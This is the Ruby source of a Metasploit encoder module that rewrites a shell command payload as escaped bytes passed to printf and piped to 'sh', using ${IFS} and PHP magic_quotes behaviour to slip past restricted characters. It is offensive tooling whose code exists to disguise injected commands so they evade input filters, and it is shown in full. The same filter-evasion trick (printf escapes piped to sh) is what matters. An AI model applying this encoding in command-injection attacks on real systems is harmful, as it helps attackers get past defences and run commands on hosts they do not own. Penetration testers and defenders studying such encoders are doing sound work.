Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Encoder
7

8
  # Has some issues, but overall it's pretty good
9
  # - printf(1) may not be available
10
  # - requires: "\x7c\x73\x68\x5c\x78"
11
  # - doesn't work on windows
12
  # - min size increase: 4x + 9
13
  # - max size increase: 4x + 14
14
  # However, because it intentionally leaves backslashes unescaped (assuming
15
  # that PHP's magic_quotes_gpc will take care of escaping them) it is
16
  # unsuitable for most exploits.
17
  Rank = ManualRanking
18

19
  def initialize
20
    super(
21
      'Name'             => 'printf(1) via PHP magic_quotes Utility Command Encoder',
22
      'Description'      => %q{
23
          This encoder uses the printf(1) utility to avoid restricted
24
        characters. Some shell variable substitution may also be used
25
        if needed symbols are blacklisted. Some characters are intentionally
26
        left unescaped since it is assumed that PHP with magic_quotes_gpc
27
        enabled will escape them during request handling.
28
      },
29
      'Author'           => 'jduck',
30
      'Arch'             => ARCH_CMD,
31
      'Platform'         => 'unix',
32
      'EncoderType'      => Msf::Encoder::Type::PrintfPHPMagicQuotes)
33
  end
34

35

36
  #
37
  # Encodes the payload
38
  #
39
  def encode_block(state, buf)
40

41
    # Skip encoding for empty badchars
42
    if(state.badchars.length == 0)
43
      return buf
44
    end
45

46
    # If backslash is bad, we are screwed.
47
    if (state.badchars.include?("\\")) or
48
      (state.badchars.include?("|")) or
49
      # We must have at least ONE of these two..
50
      (state.badchars.include?("x") and state.badchars.include?("0"))
51
      raise EncodingError
52
    end
53

54
    # Now we build a string of the original payload with bad characters
55
    # into \0<NNN> or \x<HH>
56
    if (state.badchars.include?('x'))
57
      hex = buf.unpack('C*').collect { |c| "\\0%o" % c }.join
58
    else
59
      hex = buf.unpack('C*').collect { |c| "\\x%x" % c }.join
60
    end
61

62
    # Build the final output
63
    ret = "printf"
64

65
    # Special case: <SPACE>, try to use ${IFS}
66
    if (state.badchars.include?(" "))
67
      ret << '${IFS}'
68
    else
69
      ret << " "
70
    end
71

72
    ret << hex << "|sh"
73

74
    return ret
75
  end
76
end
77

78